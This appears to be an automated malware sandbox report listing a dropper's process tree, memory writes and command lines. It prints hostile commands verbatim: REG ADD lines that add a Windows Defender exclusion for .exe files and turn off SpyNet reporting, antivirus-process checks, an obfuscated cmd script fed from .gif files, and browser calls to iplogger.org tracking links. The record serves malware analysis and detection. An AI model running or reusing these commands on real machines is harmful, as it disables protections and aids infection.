7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exeFiles.exemsedge.exeFolder.exemsedge.exeInstall.exeInstallation.execmd.exeInstallations.exerUNdlL32.eXemsedge.exesetup_installer.exesetup_install.exe

description	pid	process	target process
PID 3524 wrote to memory of 3732	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Files.exe
PID 3524 wrote to memory of 3732	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Files.exe
PID 3524 wrote to memory of 3732	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Files.exe
PID 3732 wrote to memory of 4220	3732	Files.exe	File.exe
PID 3732 wrote to memory of 4220	3732	Files.exe	File.exe
PID 3732 wrote to memory of 4220	3732	Files.exe	File.exe
PID 3524 wrote to memory of 4828	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	msedge.exe
PID 3524 wrote to memory of 4828	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	msedge.exe
PID 3524 wrote to memory of 4848	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Folder.exe
PID 3524 wrote to memory of 4848	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Folder.exe
PID 3524 wrote to memory of 4848	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Folder.exe
PID 3524 wrote to memory of 4812	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	jg3_3uag.exe
PID 3524 wrote to memory of 4812	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	jg3_3uag.exe
PID 3524 wrote to memory of 4812	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	jg3_3uag.exe
PID 3524 wrote to memory of 1560	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Install.exe
PID 3524 wrote to memory of 1560	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Install.exe
PID 3524 wrote to memory of 1560	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Install.exe
PID 3524 wrote to memory of 2408	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Info.exe
PID 3524 wrote to memory of 2408	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Info.exe
PID 3524 wrote to memory of 2408	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Info.exe
PID 4828 wrote to memory of 2892	4828	msedge.exe	msedge.exe
PID 4828 wrote to memory of 2892	4828	msedge.exe	msedge.exe
PID 3524 wrote to memory of 3084	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	pub2.exe
PID 3524 wrote to memory of 3084	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	pub2.exe
PID 3524 wrote to memory of 3084	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	pub2.exe
PID 4848 wrote to memory of 4780	4848	Folder.exe	Folder.exe
PID 4848 wrote to memory of 4780	4848	Folder.exe	Folder.exe
PID 4848 wrote to memory of 4780	4848	Folder.exe	Folder.exe
PID 3524 wrote to memory of 3432	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	KRSetp.exe
PID 3524 wrote to memory of 3432	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	KRSetp.exe
PID 3524 wrote to memory of 3700	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Installation.exe
PID 3524 wrote to memory of 3700	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Installation.exe
PID 3524 wrote to memory of 3700	3524	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe	Installation.exe
PID 3732 wrote to memory of 3696	3732	Files.exe	msedge.exe
PID 3732 wrote to memory of 3696	3732	Files.exe	msedge.exe
PID 3696 wrote to memory of 3712	3696	msedge.exe	msedge.exe
PID 3696 wrote to memory of 3712	3696	msedge.exe	msedge.exe
PID 1560 wrote to memory of 1512	1560	Install.exe	cmd.exe
PID 1560 wrote to memory of 1512	1560	Install.exe	cmd.exe
PID 1560 wrote to memory of 1512	1560	Install.exe	cmd.exe
PID 3700 wrote to memory of 2196	3700	Installation.exe	Installations.exe
PID 3700 wrote to memory of 2196	3700	Installation.exe	Installations.exe
PID 3700 wrote to memory of 2196	3700	Installation.exe	Installations.exe
PID 1512 wrote to memory of 3100	1512	cmd.exe	taskkill.exe
PID 1512 wrote to memory of 3100	1512	cmd.exe	taskkill.exe
PID 1512 wrote to memory of 3100	1512	cmd.exe	taskkill.exe
PID 2196 wrote to memory of 4448	2196	Installations.exe	setup_installer.exe
PID 2196 wrote to memory of 4448	2196	Installations.exe	setup_installer.exe
PID 2196 wrote to memory of 4448	2196	Installations.exe	setup_installer.exe
PID 380 wrote to memory of 404	380	rUNdlL32.eXe	rundll32.exe
PID 380 wrote to memory of 404	380	rUNdlL32.eXe	rundll32.exe
PID 380 wrote to memory of 404	380	rUNdlL32.eXe	rundll32.exe
PID 3700 wrote to memory of 3116	3700	Installation.exe	msedge.exe
PID 3700 wrote to memory of 3116	3700	Installation.exe	msedge.exe
PID 3116 wrote to memory of 680	3116	msedge.exe	msedge.exe
PID 3116 wrote to memory of 680	3116	msedge.exe	msedge.exe
PID 4448 wrote to memory of 2380	4448	setup_installer.exe	setup_install.exe
PID 4448 wrote to memory of 2380	4448	setup_installer.exe	setup_install.exe
PID 4448 wrote to memory of 2380	4448	setup_installer.exe	setup_install.exe
PID 2380 wrote to memory of 2172	2380	setup_install.exe	cmd.exe
PID 2380 wrote to memory of 2172	2380	setup_install.exe	cmd.exe
PID 2380 wrote to memory of 2172	2380	setup_install.exe	cmd.exe
PID 2380 wrote to memory of 3544	2380	setup_install.exe	cmd.exe
PID 2380 wrote to memory of 3544	2380	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe
"C:\Users\Admin\AppData\Local\Temp\7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3524

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3732

C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji7
3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdc44d46f8,0x7ffdc44d4708,0x7ffdc44d4718
4⤵
PID:3712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8
4⤵
PID:2260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
4⤵
PID:3304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
4⤵
PID:5568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
4⤵
PID:5584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
4⤵
PID:5864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:1
4⤵
PID:6028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5696 /prefetch:8
4⤵
PID:4016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1
4⤵
PID:2676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
4⤵
PID:5836

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
4⤵
PID:4320

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
4⤵
PID:6172

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6ae175460,0x7ff6ae175470,0x7ff6ae175480
5⤵
PID:5012

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5464 /prefetch:8
4⤵
PID:1144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16141645262337952215,1676775101420404156,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6644 /prefetch:2
4⤵
PID:6544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Suspicious use of WriteProcessMemory
PID:4828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffdc44d46f8,0x7ffdc44d4708,0x7ffdc44d4718
3⤵
PID:2892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,17237228446393573226,3036719258764849132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17237228446393573226,3036719258764849132,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
3⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4848

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:4780

C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
2⤵
- Executes dropped EXE
PID:4812

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3100

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2408

C:\Users\Admin\Documents\cVIy4rituaNtEpNWJqKPNPHL.exe
"C:\Users\Admin\Documents\cVIy4rituaNtEpNWJqKPNPHL.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 624
4⤵
- Program crash
PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 1328
4⤵
- Program crash
PID:5396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 1380
4⤵
- Program crash
PID:5196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 1388
4⤵
- Program crash
PID:6792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "cVIy4rituaNtEpNWJqKPNPHL.exe" /f & erase "C:\Users\Admin\Documents\cVIy4rituaNtEpNWJqKPNPHL.exe" & exit
4⤵
PID:2300

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "cVIy4rituaNtEpNWJqKPNPHL.exe" /f
5⤵
- Kills process with taskkill
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 1412
4⤵
- Program crash
PID:4000

C:\Users\Admin\Documents\VT2PIXW1wgHAS9i6fVjVrBut.exe
"C:\Users\Admin\Documents\VT2PIXW1wgHAS9i6fVjVrBut.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3416

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:6532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 972
4⤵
- Program crash
PID:2980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 972
4⤵
- Program crash
PID:4100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1040
4⤵
- Program crash
PID:6868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1072
4⤵
- Program crash
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 888
4⤵
- Program crash
PID:6280

C:\Users\Admin\Documents\X_e0JxI2soazC29IRwTT5vIJ.exe
"C:\Users\Admin\Documents\X_e0JxI2soazC29IRwTT5vIJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 460
4⤵
- Program crash
PID:3248

C:\Users\Admin\Documents\s3RGjQowmy9tsi_KzRTowd3J.exe
"C:\Users\Admin\Documents\s3RGjQowmy9tsi_KzRTowd3J.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3000

C:\Users\Admin\Documents\suddH5hIb2rDpzUSpA1FpMSZ.exe
"C:\Users\Admin\Documents\suddH5hIb2rDpzUSpA1FpMSZ.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:6472

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:5784

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:212

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:2796

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:2068

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:960

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
6⤵
PID:6468

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
6⤵
PID:3804

C:\Users\Admin\Documents\AQMtlF1kwoxFoUJhElrsVE2h.exe
"C:\Users\Admin\Documents\AQMtlF1kwoxFoUJhElrsVE2h.exe"
3⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\1a07c9bb-98c0-458f-a5e8-03034e1df3b8.exe
"C:\Users\Admin\AppData\Local\Temp\1a07c9bb-98c0-458f-a5e8-03034e1df3b8.exe"
4⤵
PID:6460

C:\Users\Admin\Documents\2iE0SvnRU5CQlXD1qofCQpQI.exe
"C:\Users\Admin\Documents\2iE0SvnRU5CQlXD1qofCQpQI.exe"
3⤵
- Executes dropped EXE
PID:2992

C:\Users\Admin\Documents\vRPfrgXDptMBnWhqrzb0HFhU.exe
"C:\Users\Admin\Documents\vRPfrgXDptMBnWhqrzb0HFhU.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4380

C:\Users\Admin\Documents\vRPfrgXDptMBnWhqrzb0HFhU.exe
"C:\Users\Admin\Documents\vRPfrgXDptMBnWhqrzb0HFhU.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3264

C:\Users\Admin\Documents\r3B7BZ5lDo896LaXsX5cuWj7.exe
"C:\Users\Admin\Documents\r3B7BZ5lDo896LaXsX5cuWj7.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 456
4⤵
- Program crash
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 480
4⤵
- Program crash
PID:4404

C:\Users\Admin\Documents\T0w69jYr5T1jBfusUCaLgwwg.exe
"C:\Users\Admin\Documents\T0w69jYr5T1jBfusUCaLgwwg.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 460
4⤵
- Program crash
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 468
4⤵
- Program crash
PID:6808

C:\Users\Admin\Documents\_oKUftCc7iUfqhafMneKfQhA.exe
"C:\Users\Admin\Documents\_oKUftCc7iUfqhafMneKfQhA.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4036

C:\Users\Admin\AppData\Local\Temp\7zS68F4.tmp\Install.exe
.\Install.exe
4⤵
- Suspicious use of SetWindowsHookEx
PID:6768

C:\Users\Admin\AppData\Local\Temp\7zS9042.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6600

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:5984

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1484

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:776

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:5856

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:5196

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:3516

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
- Executes dropped EXE
PID:5860

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:6156

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:4996

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:6576

C:\Windows\SysWOW64\schtasks.exe
